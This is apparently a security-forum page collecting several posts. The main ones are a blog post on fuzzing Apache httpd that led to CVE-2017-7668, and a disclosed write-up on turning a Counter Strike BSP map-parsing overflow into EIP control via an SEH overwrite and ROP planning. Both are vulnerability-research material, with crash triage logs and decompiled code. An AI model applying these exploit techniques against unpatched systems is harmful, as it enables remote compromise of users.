. . . . . . . . . . . . . . . 50 5.2.2 Creating a Boot Sector to Bootstrap our Kernel . . . . . . . . . 50 5.2.3 Finding Our Way into the Kernel . . . . . . . . . . . . . . . . . 53 5.3 Automating Builds with Make . . . . . . . . . . . . . . . . . . . . . . . . 54 5.3.1 Organising Our Operating System’s Code Base . . . . . . . . . 57 5.4 C Primer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 59 5.4.1 The Pre-processor and Directives . . . . . . . . . . . . . . . . . 59 5.4.2 Function Declarations and Header Files . . . . . . . . . . . . . . 60 6 Developing Essential Device Drivers and a Filesystem 62 6.1 Hardware Input/Output . . . . . . . . . . . . . . . . . . . . . . . . . . . 62 6.1.1 I/O Buses . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 63 6.1.2 I/O Programming . . . . . . . . . . . . . . . . . . . . . . . . . . 63 6.1.3 Direct Memory Access . . . . . . . . . . . . . . . . . . . . . . . 65 6.2 Screen Driver . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 65 6.2.1 Understanding the Display Device . . . . . . . . . . . . . . . . . 65 6.2.2 Basic Screen Driver Implementation . . . . . . . . . . . . . . . . 65 6.2.3 Scrolling the Screen . . . . . . . . . . . . . . . . . . . . . . . . . 69 6.3 Handling Interrupts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 70 6.4 Keyboard Driver . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 70 6.5 Hard-disk Driver . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 70 6.6 File System . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 70 7 Implementing Processes 71 7.1 Single Processing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 71 7.2 Multi-processing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 71 CONTENTS iv 8 Summary 72 Bibliography 73 Download: http://www.cs.bham.ac.uk/~exr/lectures/opsys/10_11/lectures/os-dev.pdf

domingo, 16 de julio de 2017 From fuzzing Apache httpd server to CVE-2017-7668 and a 1500$ bounty Intro In the previous post I thoroughly described how to fuzz Apache's httpd server with American Fuzzy Lop. After writing that post and, to my surprise, got a few crashing test cases. I say "to my surprise" because anybody who managed to get some good test cases could have done it before me and, despite of it, I was the first in reporting such vulnerability. So here's the blog of it! Goal After seeing Apache httpd server crashing under AFL, lots of problems arise such as, the crashing tests doesn't crash outside of the fuzzer, the stability of the fuzzed program goes way down, etc. In this blog post we will try to give an explanation to such happenings while showing how to get the bug and, finally, we will shed some light on the crash itself. Takeaways for the reader Testcases scrapped from wikipedia Bash-fu Taos Valgrind for triage Valgrind + gdb: Learn to not always trust Valgrind rr The test cases Since this was just a testing case for myself to fuzz network based programs with AFL, I did not bother too much on getting complex or test cases that had a lot of coverage. So, in order to get a few test cases that would cover a fair amount of a vanilla installation of Apache's httpd server, I decided to look up an easy way to scrap all the headers from the List of headers - WIki Page. Bash-fu Tao 1: Butterfly knife cut The first thing I did is just copy paste the two tables under Request Fields into a text file with your editor of choice. It is important that your editor of choice doesn't replace tabs for spaces or the cut command will lose all its power. I chose my file to be called "wiki-http-headers" and after populating it, we select the third column of the tables we can do the following. Remember that the default delimiter for cut is the TAB character: ? 1 cat wiki-http-headers | cut -f3 | grep ":" | sed "s#Example....##g" | sort -u We can see that some headers are gone such as the TSV header. I ignored such and went on to fuzzing since coverage was not my concern - the real goal was to fuzz. Maybe you can find new 0-days with the missing headers! Why not? Bash-fu Tao 2: Chain punching with "for" Now that we have learned our first Tao, it is time to iterate on each header and create a test case per line. Avid bash users will already know how to do this but for these newcomers and also learners here's how: ? 1 a=0 && IFS=$'\n' && for header in $(cat wiki-http-headers | cut -f3 | grep ":" | sort -u); do echo -e "GET / HTTP/1.0\r\n$header\r\n\r\n" > "testcase$a.req";a=$(($a+1)); done && unset IFS Let me explain such an abomination quickly. There is a thing called the Internal Field Separator (IFS) which is an environment variable holding the tokens that delimit fields in bash. The IFS by default in bash considers the space, the taband the newline. Those separators will interfere with headers when encountering spaces because the for command in bash iterates over a given list of fileds (fields are separated by the IFS) - this is why we need to set the IFS to just the newline. Now we are ready to just iterate and echo each header to a different file (the a variable helps to dump each header to a file with a different name). Bash-fu Tao Video Here is one way to approach the full bash-fu Taos: The fuzzing Now that we have gathered a fair amount of (rather basic) test cases we can start now our fuzzing sessions. This section is fairly short as everything on how to fuzz Apache httpd is explained in the previous post. However, there minimal steps are: Download apr, apr-utils, nghttpd2, pcre-8 and Apache httpd 2.4.25 Install the following dependencies: sudo apt install pkg-config sudo apt install libssl-dev Patch Apache httpd Compile with the appropriate flags and installation path (PREFIX environment variable) Now it all should be ready and set up to start fuzzing Apache httpd. As you can see in the following video, with a bit of improved test cases the crash doesn't take long to come up: It is worth mentioning that I cheated for this demo a bit as I introduced already a test case I knew it would make it crash "soon". How I obtained the crashing testcase was through a combination of honggfuzz, radamsa and AFL while checking the stability + "variable behaviour" folder of AFL. The crashing Dissapointment First things first. When having a crashing test case it is mandatory to test if it is a false positive or not, right? Let's try it: Euh... it doesn't crash outside Apache. What could be happening? Troubleshooting There are a few things to test against here... - First of all we are fuzzing in persistent mode: This means that maybe our test case did make the program crash but that it was one of many. In our case the __AFL_LOOP variable was set to over 9000 (a bit too much to be honest). For those that don't know what said variable is for, it is the number of fuzzing iterations that AFL will run before restarting the whole process. So, in the end, the crashing test case AFL discovered, would need to be launched in a worst case scenario, as follows: Launch all other non-crashing 8999 inputs and then launch the crashing one (i.e. the last test case) number 9000. - The second thing to take into account is the stability that AFL reports: The stability keeps going lower and lower. Usually (if you have read the readme from AFL you can skip this part) low stability could be to either, use of random values (or use of date functions, hint hint) in your code or usage of uninitialised memory. This is key to our bug. - The third and last (and least in our case) would be the memory assigned to our fuzzed process: In this case the memory is unlimited as we are running afl with "-m none" but in other cases it can be an indicator of overflows (stack or heap based) and access to unallocated memory. Narrowing down the 9000 To test against our first assumption we need more crashing cases. To do so we just need to run AFL with our "crashing" test case only. It will take no time to find new paths/crashes which will help us narrow down our over 9000 inputs to a much lower value. Now, onto our second assumption... Relationship goals: Stability When fuzzing, we could check that stability was going down as soon as AFL was getting more and more into crashing test cases - we can tell there is some kind of correlation between the crashes and memory. To test if we are actually using uninitialised memory we can use a very handy tool called... Valgrind Valgrind is composed by a set of instrumentation tools to do dynamic analysis of your programs. By default, it is set to run "memcheck", a tool to inspect memory management. To install Valgrind on my Debian 8 I just needed to install it straight from the repositories: ? 1 sudo apt install valgrind After doing that we need to run Apache server under Valgrind with: ? 1 NO_FUZZ=1 valgrind -- /usr/local/apache-afl-persist/bin/httpd -X The NO_FUZZ environment variable is read by the code in the patch to prevent the fuzzing loop to kick in. After this we need to launch one of our "crashing" test cases into Apache server running under Valgrind and, hopefully, our second assumption about usage of uninitialised memory will be confirmed: We can confirm that, yes, Apache httpd is making use of uninitialised values but, still... I wasn't happy that Apache won't crash so let's use our Bash-fu Tao 2 to iterate over each test case and launch it against Apache. Good good, it's crashing now! We can now proceed to do some basic triage. The triage Let's do a quick analysis and see which (spoiler) header is the guilty one... gdb + valgrind One cool feature about valgrind is that, it will let you analyse the state of the of the program when an error occurs. We can do this through the --vgdb-error=1 flag. This flag will tell valgrind to stop execution on the first error reported and will wait for a debugger to attach to it. This is perfect for our case since it seems that we are accessing uninitialised values and accessing values outside of a buffer (out-of-bounds read) which is not a segfault but it still is an error under valgrind. To use this feature, first we need to run in one shell: ? 1 NO_FUZZ=1 valgrind --vgdb-error=0 -- /usr/local/apache_afl_blogpost/bin/httpd -X Then, in a second separate shell, we send our input that triggers the bug: ? 1 cat crashing-testcase.req | nc localhost 8080 Finally, in a third shell, we run gdb and attach through valgrind's command: ? 1 target remote | /usr/lib/valgrind/../../bin/vgdb We are now inspecting what is happening inside Apache at the exact point of the error: Figure 1 - Inspecting on first valgrind reported error. As you can see the first reported error is on line 1693. Our intuition tells us it is going to be the variable s as it is being increased without any "proper" checks, apart from the *s instruction, which will be true unless it points to a null value. Since s is optimised out at compile time, we need to dive into the backtrace by going up one level and inspecting the conn variable which is the one that s will point to. It is left as an exercise for the reader as to why the backtrace shown by pwndbg is different than the one shown by the "bt" command. For the next figures, keep in mind the 2 highlighted values on Figure 1: 0x6e2990c and 8749. Here is where, for our analysis, the number from Figure 1, 8749, makes sense as we can see that the variable conn is allocated with 8192 bytes at 0x6e2990c. We can tell that something is wrong as 8749 is way far from the allocated 8192 bytes. This is how we calculated the previous 8749 bytes. We stepped into the next error reported by valgrind through issuing the gdb "continue" command and letting it error out. There was an invalid read at 0x6e2bb39 and the initial pointer to the "conn" variable was at 0x6e2990c. Remember that s is optimized out so we need to do some math here as we can't get the real pointer from s on debugging time. Said this, we need to get the offset with: invalid_read_offset = valgrind_error_pointer - conn which is: 8749 = 0x6e2bb39 - 0x6e2990c rr - Record & Replay Framework During the process of the triage, one can find several happenings that can hinder the debugging process: Apache will stop out of nowhere (haven't managed to get the reason why), valgrind will make it crash on parts that it is not supposed to because of it adding its own function wrappers, the heap will be different on valgrind debugging sessions than plain gdb or vanilla runs, etc. Here is where the Record & Replay Framework comes in handy: Deterministic replaying of the program's state. You can even Replay the execution backwards which, in our case, is totally awesome! Must say I discovered this tool thanks to a good friend and colleague of mine, Symeon Paraschoudis, who introduced this marvellous piece of software to me. Let's cause the segmentation fault while recording with rr and replay the execution: Full analysis is not provided as it is outside of the scope of this post. Conclusions We have learned how to use bash to effectively scrap stuff as test cases from the web and to believe that, even thought hundreds of people might be fuzzing a certain piece of software, we can still add our value when using the right combination of tools, mutations and knowledge. Tools have been discovered along the way that will aid and help further triage. Stay tuned for the search of animal 0day! Cross-posts from the SensePost blog upcoming with challenges on heap-exploitation! Post-Scriptum I am willing to donate the 1500$ bounty I received from the Internet Bug Bounty to any organisation related to kids schooling and, especially, those teaching and providing means regarding Information Technologies. Knowledge is Power! So tune in and leave your suggestions in the comment section below; I have thought of ComputerAid, any opinions on this? Publicado por Javier Jiménez en 14:24 Sursa: https://animal0day.blogspot.ro/2017/07/from-fuzzing-apache-httpd-server-to-cve.html

inca mai exista chatul pe rst?

Lock and Load: Exploiting Counter Strike via BSP Map Files Jul 7, 2017 • Grant What makes Counter Strike an interesting target is that it relies on a game lobby for players to find and select servers to play on. Upon connecting to the server, the game client will automatically download any required resources (maps, textures, sounds, etc.). Once all of the resources have been downloaded, they have to be loaded and parsed from disk into memory. Only then will the client begin receiving commands and entity updates from the server. This automatic resource fetching looked like the ticket to a remotely exploitable vulnerability via a local file. The vulnerability discussed in this article has been disclosed to Valve Security and the patch publicly deployed on July 10th. I would like to extend my thanks to the Valve Security team and specifically to Alfred Reynolds who was my liaison during the disclosure process. The whole process, from initial email to fix, lasted less than 30 days. I certainly look forward to disclosing to Valve in the future. Go, go, go! - Finding Crashes My approach to finding bugs was to use the tried and true method of fuzzing. Essentially I gathered a bunch of existing BSP map files for my corpus and then used them as seeds to my fuzzing engine. This will corrupt them and then feed them back in to the program (CZ) to be parsed while being watched for any crashes. If a crash is found, it is recorded and stored for later triage and classification. I figured that highly complex file formats such as .BSP would map quite well to low-level memcpy operations in the engine. It’s even possible that stored sizes of data structures in the BSP file will be less validated than most file formats. I had a few false starts to this project when selecting a fuzzer to use. First I tried honggfuzz under Cygwin, but this proved to be completely broken for crash detection. Next I tried WinAFL which I was unable to get to work due to some binary incompatibilities and possible Windows 10 issues. This led to a multi-day rabbit hole of building DynamicRIO from source and rebuilding WinAFL against it. In the end I gave up trying to get a coverage based fuzzer to work and went instead with the solid CERT Basic Fuzzing Framework (BFF). This proved to be an excellent choice due to its easy configuration file and deep integration with Microsoft debugging tools, including WinDBG and !exploitable. I also had some relevant experience with the framework through fuzzing VLC when it used to be called Failure Observation Engine (FOE). BFF is a simple “dumb” fuzzer, meaning it merely corrupts bytes in the file and writes it back out. It has no knowledge of the BSP file format or of the target it is fuzzing. This is great for quick setup, but for more complex formats, code coverage of the parsing code may be limited. For shallow bugs, dumb fuzzing will not have much of an issue finding them. With this fuzzer in mind, I went about exploring instrumentation on the GoldSrc engine. When running a game on this engine, the executable hl.exe boots, loads common engine resources, and then loads a game specific DLL (known as a client DLL or cl_dll) which drives the engine via a proxy API. This API and the associated utilities are the primary SDK interface that many game modders deal with. Technically Counter Strike 1.6 (cstrike) and Condition Zero (czero) are both considered “mods” as they merely use the proxy API for gameplay. When running a mod like CZ, the engine command line looks like: hl.exe -game czero $OTHER_ARGS. In order to quickly iterate through map files, I looked up the command line flags for starting the engine with CZ and to load a map upon start. This is the command line I used: C:\Program Files (x86)\Steam\steamapps\common\Half-Life\hl.exe -game czero -dev -window -console +sv_lan 1 +map MAP_NAME where -window makes it so I can fuzz and browse the web at the same time, sv_lan 1 makes a local-only server, and map immediately changes the map on login. With the ability to programmatically run the engine, I installed BFF, Debugging Tools for Windows, and then started configuring BFF. BFF installs to C:\BFF by default and has the concept of a fuzzing campaign. I started a new one for CZ and then edited the bff.yaml configuration file: campaign: id: counter strike czero keep_heisenbugs: False use_buttonclicker: False target: program: C:\Users\MyName\.babun\cygwin\bin\bash.exe cmdline_template: $PROGRAM -c '"C:/BFF/mover.sh" $SEEDFILE "C:/Program Files (x86)/Steam/steamapps/common/Half-Life/hl.exe" -game czero -dev -window -console +sv_lan 1 +map aim_fuzz' NUL ... directories: seedfile_dir: seedfiles\bsp working_dir: fuzzdir results_dir: results ... fuzzer: fuzzer: bytemut fuzz_zip_container: False Everything except program, cmdline_template, and seedfile_dir are the defaults. Notice that this cmdline isn’t just running hl.exe. This is because I ran into problems getting the corrupted BSP file to be read by the engine. GoldSrc has a dedicated, per-mod resource directory and will not load resources based on an absolute path. Hence, I made a bash script under Cygwin to first move the generated BSP file to the resource directory as aim_fuzz.bsp. It’s a simple three-liner, it gets the job done, and doesn’t affect crash detection due to exec: /bin/cp "$1" "c:\\Program Files (x86)\\Steam\\steamapps\\common\\Half-Life\\czero_downloads\\maps\\aim_fuzz.bsp" shift exec "$@" It’s unfortunate that BFF doesn’t support post-processing fuzzed files like honggfuzz does, since this would have eliminated the need for this hack. With the fuzzer set up, I copied all of the map files less than 3.0 MB from my czero_downloads/maps folder into the seedfiles\bsp directory. This left me with 74 map files as seeds. I could have used more, but as you will see, finding crashes was not that difficult. Fire in the Hole! - Triaging Crashes After running for less than a day on a single Windows 10 x64 machine, 43 crashes were found. It’s no surprise that the BSP parsing turned up a lot of unique crashes as it’s a complex file format combining many different data objects into one format. Here’s the crash breakdown by predicted severity: 3 - EXPLOITABLE 5 - PROBABLY_EXPLOITABLE 35 - UNKNOWN Thanks to MSEC’s !exploitable, most of the hard crash triage was already done. Each crash folder had the minimized test case along with a full WinDBG log and !analyze output. In order to reproduce these crashes, BFF provides a nice script called repro.py. Running python C:\BFF\tools\repro.py -w PATH_TO_FUZZED_FILE will drop you into a WinDBG GUI for further investigation. With that, let’s take a look at the three EXPLOITABLE crashes. Crash #1 Now this looks interesting. EIP looks like ASCII which might mean we have control over it! ... Spawn Server aim_fuzz Clearing memory Using WAD File: uacyber_stproz.wad Using WAD File: as_tundra.wad Using WAD File: halflife.wad Using WAD File: cs_dust.wad Using WAD File: cs_cbble.wad Texture load: 56.7ms WARNING: failed to locate sequence file aim_fuzz "sv_maxspeed" changed to "900" GAME SKILL LEVEL:1 "pausable" changed to "0" Executing listen server config file (465c.4c78): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. 44334143 ?? ??? ... !exploitable 1.6.0.0 HostMachine\HostUser Executing Processor Architecture is x86 Debuggee is in User Mode Debuggee is a live user mode debugging session on the local machine Event Type: Exception Exception Faulting Address: 0x44334143 First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005) Exception Sub-Type: Data Execution Protection (DEP) Violation Exception Hash (Major/Minor): 0x1e2606b6.0x1e2606b6 Hash Usage : Stack Trace: Major+Minor : Unknown Instruction Address: 0x0000000044334143 Description: Data Execution Prevention Violation Short Description: DEPViolation Exploitability Classification: EXPLOITABLE Recommended Bug Title: Exploitable - Data Execution Prevention Violation starting at Unknown Symbol @ 0x0000000044334143 (Hash=0x1e2606b6.0x1e2606b6) Unfortunately further investigation showed that this wasn’t the case and EIP just coincidentally got an ASCII-only value. Let’s dive into IDA to investigate…but where was the original faulting instruction? How did we get to 0x44334143? This called for some WinDBG learning. I needed a way to know what the last instruction was right before the DEP violation. Originally before writing this post, I had single stepped WinDBG until arriving at the faulting address. But now when I reproduce the crash I’ve come to realize that the backtrace contains the last stack frame. If this crash had caused stack corruption then this approach wouldn’t have worked, since stack corruption would have corrupted the stack frames (i.e. the saved EBP value). 1:005:x86> kb ChildEBP RetAddr Args to Child WARNING: Frame IP not in any known module. Following frames may be wrong. 0019f2c0 00000000 028e433d 10342a7c 10342a88 0x44334143 1:005:x86> r eax=00000080 ebx=10342a88 ecx=10342a7c edx=1069d298 esi=106e4b34 edi=10342938 eip=44334143 esp=0019f2c4 ebp=0019f2e4 iopl=0 ov up ei pl nz ac pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210a16 44334143 ?? ??? I tried visiting 0x28e433d in IDA and I saw this function call: Stepping into this function showed this: It looks like the jmp target has been controlled from a starting offset via EAX. It looks like an attempt was made to prevent the function pointer index from going above 7, but JGE on x86 is a signed comparison! This means that EAX can go negative (0x80 - 0xff) and pass the check as this signed char is casted to unsigned char for the jump. In WinDBG at the time of the crash, EAX was 0x80. Doing some pointer math of 0x297bad4+[0x80∗4]=0x297bcd40x297bad4+[0x80∗4]=0x297bcd4 and then a lookup in IDA shows at the calculated address: If you notice, the CA3D string matches perfectly to our crashing address, except it’s bytes are reversed. The hex dump confirms this: So what we have is a controlled function pointer load and transfer within a range of 127 DWORDs. This read occurs from the .data section, which is read-write, but from this point, we’d have to find a controlled place in this tight range to write a known code address. With this understanding and a bit of disappointment I moved on to the other crashers to see if I’d have any better luck. Crash #2 The next crash turns out to be a little bit more interesting but not obviously easier to get code execution ... Adding: czero/dlls\mp.dll ModLoad: 00000000`256d0000 00000000`25860000 c:\program files (x86)\steam\steamapps\common\half-life\czero\dlls\mp.dll Dll loaded for mod Condition Zero ModLoad: 00000000`607e0000 00000000`6086e000 c:\program files (x86)\steam\steamapps\common\half-life\platform\servers\serverbrowser.dll ModLoad: 00000000`61700000 00000000`61757000 C:\Program Files (x86)\Steam\steamapps\common\Half-Life\vstdlib.dll MP3_InitStream(30, sound\music\downed_intro.mp3) successful Spawn Server aim_fuzz Clearing memory (61b8.7004): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. ** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Steam\steamapps\common\Half-Life\hw.dll - hw+0x3f53f: 0285f53f 8906 mov dword ptr [esi],eax ds:002b:77023e00=5d00191d ... !exploitable 1.6.0.0 HostMachine\HostUser Executing Processor Architecture is x86 Debuggee is in User Mode Debuggee is a live user mode debugging session on the local machine Event Type: Exception ** ERROR: Symbol file could not be found. Defaulted to export symbols for hl.exe - Exception Faulting Address: 0x77023e00 First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005) Exception Sub-Type: Write Access Violation Faulting Instruction:0285f53f mov dword ptr [esi],eax Exception Hash (Major/Minor): 0xdfa48bac.0x58d60243 Hash Usage : Stack Trace: Major+Minor : hw+0x3f53f ... Minor : ntdll_77470000!_RtlUserThreadStart+0x1b Instruction Address: 0x000000000285f53f Description: User Mode Write AV Short Description: WriteAV Exploitability Classification: EXPLOITABLE Recommended Bug Title: Exploitable - User Mode Write AV starting at hw+0x000000000003f53f (Hash=0xdfa48bac.0x58d60243) From this crash log, it looks like we have control over ESI. Further investigation in IDA and some reverse code lookups in ReHLDS found the original function: void Mod_LoadTextures(lump_t *l) { dmiptexlump_t *m; miptex_t *mt; ... char dtexdata[348996]; ... texture_t *tx; wads_parsed = 0; starttime = Sys_FloatTime(); if (!tested) Mod_AdInit(); if (!l->filelen) { loadmodel->textures = 0; return; } m = (dmiptexlump_t *)(mod_base + l->fileofs); // looks like we corrupted a lump header m->_nummiptex = LittleLong(m->_nummiptex); // the crashing line loadmodel->numtextures = m->_nummiptex; loadmodel->textures = (texture_t **)Hunk_AllocName(4 * loadmodel->numtextures, loadname); ... Looks like a corrupted lump fileofs which caused a bad pointer dereference on line 468. This is interesting as we have control over the entire lump contents, but it’s going to require some more reading to figure out how to achieve code execution. Overall this function is a mess of direct pointer arithmetic and there are bound to be many more ways to make this function crash. Some more digging would probably yield a write-what-where primitive, but I moved on to the next crash to see if it was easier to exploit. Crash #3 The last crash turned out to be quite interesting. The fuzzed BSP file was based upon the map awp_snowsk337.bsp (a really fun map). Here is the WinDBG output of the two crashing exceptions: ... Spawn Server aim_fuzz Clearing memory Texture load: 50.3ms (ab5c.72b8): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Steam\steamapps\common\Half-Life\hw.dll - hw+0x4ddd7: 0286ddd7 8941f8 mov dword ptr [ecx-8],eax ds:002b:001a0000=78746341 ... !exploitable 1.6.0.0 HostMachine\HostUser Executing Processor Architecture is x86 Debuggee is in User Mode Debuggee is a live user mode debugging session on the local machine Event Type: Exception Exception Faulting Address: 0x1a0000 First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005) Exception Sub-Type: Write Access Violation Exception Hash (Major/Minor): 0xfa8446e7.0xb321cd22 Hash Usage : Stack Trace: Major+Minor : hw+0x4ddd7 ... Minor : Unknown Instruction Address: 0x000000000286ddd7 Description: Exception Handler Chain Corrupted Short Description: ExceptionHandlerCorrupted Exploitability Classification: EXPLOITABLE Recommended Bug Title: Exploitable - Exception Handler Chain Corrupted starting at hw+0x000000000004ddd7 (Hash=0xfa8446e7.0xb321cd22) And when continuing from this first chance exception to the Structured Exception Handler (SEH): 1:005:x86> g;$$Found_with_CERT_BFF_2.8;r;!exploitable -v;q ModLoad: 70e20000 70e33000 C:\WINDOWS\SysWOW64\dhcpcsvc6.DLL ModLoad: 70e00000 70e14000 C:\WINDOWS\SysWOW64\dhcpcsvc.DLL (694c.9748): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=00000000 ecx=44980000 edx=774f2d90 esi=00000000 edi=00000000 eip=44980000 esp=0019ea58 ebp=0019ea78 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210246 44980000 ?? ??? !exploitable 1.6.0.0 HostMachine\HostUser Executing Processor Architecture is x86 Debuggee is in User Mode Debuggee is a live user mode debugging session on the local machine Event Type: Exception Exception Faulting Address: 0x44980000 First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005) Exception Sub-Type: Data Execution Protection (DEP) Violation Exception Hash (Major/Minor): 0x918f89cc.0x7f62488f Hash Usage : Stack Trace: Major+Minor : Unknown Excluded : ntdll_77470000!ExecuteHandler2+0x26 Excluded : ntdll_77470000!ExecuteHandler+0x24 Excluded : ntdll_77470000!KiUserExceptionDispatcher+0xf Excluded : Unknown ... Excluded : Unknown Instruction Address: 0x0000000044980000 Description: Data Execution Prevention Violation Short Description: DEPViolation Exploitability Classification: EXPLOITABLE Recommended Bug Title: Exploitable - Data Execution Prevention Violation starting at Unknown Symbol @ 0x0000000044980000 called from Unknown Symbol @ 0xffffffffc40e0000 (Hash=0x918f89cc.0x7f62488f) This crash transferred control to the default SEH on the stack, the trigger being an access violation after dereferencing the stack guard page. It looks like a nearly unlimited buffer overflow which is exactly the type of exploitability I was looking for. BFF happens to provide some heuristics to determine the “Exploitability Rank” and it gave this a 5/100 (lower is better). Crash #1 had a score of 20 (possibly exploitable) and Crash #2 a 100 (no way). The SEH handler’s address was overwritten to 0x44980000, which happens to be the float value of 1216.0. A quick search of the corrupted file with 010 Editor yielded hundreds of values like this. In order to determine the exact value that would give us control over the SEH handler, I wrote a script to incrementally replace each found value with an incrementing float value. Rerunning with the new BSP file yielded a file offset of 0x4126C bytes. Now I had control over EIP! Observe: 1:005:x86> r (694c.9748): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=00000000 ecx=deadbeef edx=774f2d90 esi=00000000 edi=00000000 eip=deadbeef esp=0019ea58 ebp=0019ea78 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210246 deadbeef ?? ??? From this point (due to DEP) I needed to ROP out of the exception handler frame and back to the old stack. For this I needed a special gadget of the form pop REG32, pop REG32, pop esp, ret or similar. The next tool that helped me start ROPing was !mona running under Immunity DBG. Using mona’s “findwild” gadget search, I tried to find an appropriate stack pivot in non-ASLR’d, non-rebased modules, but I was unable to after many hours of poring over gadgets. This was quite disappointing. Luckily I still had complete control over the stack frame, so all I needed to do was to find out how to overwrite the saved return address for the function. Dropping into IDA revealed a reasonably simple function (Note: this function was difficult to understand at first and to took me a while to understand the mapping from the BSP file to the code. This is the finished version before I found the source code online and learned the real names and data types. Many days of hard work are being glossed over.) int __cdecl GL_SubdivideSurface(MapInfo *object) { signed int numVerts; // ecx@1 int numVertsToProc; // edi@1 struct_gData *bObject; // edx@2 int initialIndex; // esi@2 float *pVEC3DATA; // ecx@2 int indexPos; // esi@2 signed int index; // edi@3 int offset; // eax@4 float *pVEC3; // eax@6 float VEC3DATA[192]; // [sp+4h] [bp-304h]@2 int numVertsStack; // [sp+304h] [bp-4h]@2 int vec3Count; // [sp+310h] [bp+8h]@2 numVerts = 0; g_modVuln = object; numVertsToProc = object->numVerts; if ( numVertsToProc > 0 ) { bObject = g_CurBObject; initialIndex = object->initialIndex; // 00002c4c pVEC3DATA = &VEC3DATA[1]; vec3Count = object->numVerts; // initially 0x9c (this was corrupted from fuzzer) indexPos = initialIndex; numVertsStack = numVertsToProc; do { index = bObject->INDEX_BUFFER[indexPos]; if ( index <= 0 ) offset = bObject->VERTEX_BUFFER_INDEX[-4 * index + 1]; else offset = bObject->VERTEX_BUFFER_INDEX[4 * index]; ++indexPos; pVEC3DATA += 3; pVEC3 = &bObject->VECTOR_DATA[3 * offset]; *(pVEC3DATA - 4) = *pVEC3; *(pVEC3DATA - 3) = pVEC3[1]; *(pVEC3DATA - 2) = pVEC3[2]; // overwrite here --vec3Count; } while ( vec3Count ); numVerts = numVertsStack; } return SubdivideSurface(numVerts, (int)VEC3DATA);// if numverts == 0, this function returns quick } By reading the excellent IDA decompiled source with struct types, I determined that BFF had corrupted the vec3Countvariable. This caused more than 64 VEC3 (three 4-byte floats) to be placed into the VEC3DATA struct causing the numVertsStack and vec3Count variables to be corrupted. vec3Count was corrupted to a large number, which is why we saw the exception at 0286ddd7 mov dword ptr [ecx-8],eax when it overwrote the guard page. Get out of there, it’s gonna blow! - Exploiting the Crash At this point I still need to solve three problems in order to gain code execution: Where in the BSP file maps to the VECTOR_DATA, INDEX_BUFFER and VERTEX_BUFFER_INDEX data streams? How do I bypass the SubdivideSurface function so that the GL_SubdivideSurface returns? How do I disable DEP and start running shellcode? Problem #1 I did some more digging with 010 Editor (this tool proved so invaluable that I bought it) and using a similar approach to finding the SEH handler offset, I found the starting offsets for all three buffers. There was some guessing and fudging of the numbers to get things just right, but it worked for the file I was corrupting, so I didn’t worry about perfecting it. In possible future BSP exploits, I’d like to understand more about the file format in order to create more knowledgeable exploit generators. My first effort towards this has been the creation of an 010 Editor binary template file for parsing out the Half-Life 1 BSP format (version 30 with no magic FourCC value in the header). 010 Editor is my go to tool for reverse engineering and viewing binary file formats. The BSP format has many versions and modifications. The Half-Life 1 version is documented here. In short, BSP is made up of “lumps” which are just blocks of bytes that have a defined data structure, such as textures, vertices, edges, faces, entities, etc. Through fuzzing, different parts of the lumps will be affected, which will affect the parsing of the file. Problem #2 The GL_SubdivideSurface function must return in order to pop the corrupted saved return address off the stack, but there is a tail call of SubdivideSurface which prevents this. Also there is a bounds check on the numVerts which limits it to 60 (not enough to overflow important data). int __cdecl SubdivideSurface(signed int numVerts, int object) { if ( numVerts > 60 ) sub_28C8450("numverts = %i", numVerts); sub_286D4C0(numVerts, (float *)object, (int)v35, (int)v31); for ( i = 0; ; ++i ) { if ( i >= 3 ) { result = sub_28E5D30(28 * (numVerts - 4) + 128); v26 = result; *(_DWORD *)result = gWarpface->field_24; *(_DWORD *)(result + 12) = *(_DWORD *)&gWarpface->gap0[8]; gWarpface->field_24 = result; *(_DWORD *)(result + 8) = numVerts; v30 = 0; while ( v30 < numVerts ) { ... } return result; // we want to reach here to exit quickly } v2 = (v35[i] + v31[i]) * 0.5; v24 = floor(v2 / 64.0 + 0.5) * 64.0; if ( v31[i] - v24 >= 8.0 && v24 - v35[i] >= 8.0 ) break; } ... SubdivideSurface(v34, (int)&v39); return SubdivideSurface(v46, (int)&v43); } Further reading of this function made me realize that if could I can somehow change the numVerts input argument then I could quickly bypass this function. To my luck, the GL_SubdivideSurface stack frame had numVerts right below the overflowed buffer. This meant that I could control the variable to fake the number of vertices processed SubdivideSurface, effectively bypassing it. Problem #3 With the knowledge of where to place my data in the BSP file (to cause reliable bytes to be placed on the stack), I just needed a nice ROP chain that would allow me to disable DEP on the current stack page and then jump to my shellcode. Mona to the rescue! Simply running !mona rop and waiting an hour I was left with a nice, DEP-disabling ROP chain. I also learned that you can use VirtualAlloc on already allocated memory to set flags, just like VirtualProtect. I initially tried to use VirtualProtect, but none of the safe modules had any references to it. Only four modules were available for ROP gadgets in the process: hl.exe, filesystem_stdio.dll, hw.dll, steamclient.dll, and icudt.dll. Unfortunately the reliability of this exploit was limited due to the heavy usage of gadgets from steamclient.dll, which changes on every steam update. This actually happened during my exploitation process, necessitating a re-generation of 